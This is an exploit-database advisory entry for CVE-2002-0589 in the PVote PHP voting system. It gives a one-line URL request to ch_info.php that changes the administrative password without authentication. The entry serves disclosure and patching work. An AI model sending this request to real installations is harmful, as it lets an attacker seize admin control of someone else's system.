PVote 1.0/1.5 - Unauthorized Administrative Password Change
Author: Daniel Nyström
type: webapps
platform: php
port:
date_added: 2002-04-18
date_updated: 2012-09-19
verified: 1
codes: CVE-2002-0589;OSVDB-14425
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/4541/info
PVote is a web voting system written in PHP. It will run on most Unix and Linux variants as well as Microsoft Windows operating systems.
It is possible to change the administrative password by submitting a malicious web request containing the appropriate values for the URL parameters. No authentication credentials are required.
http://target/pvote/ch_info.php?newpass=password&confirm=password
where password is the attacker-supplied value for the new administrative password.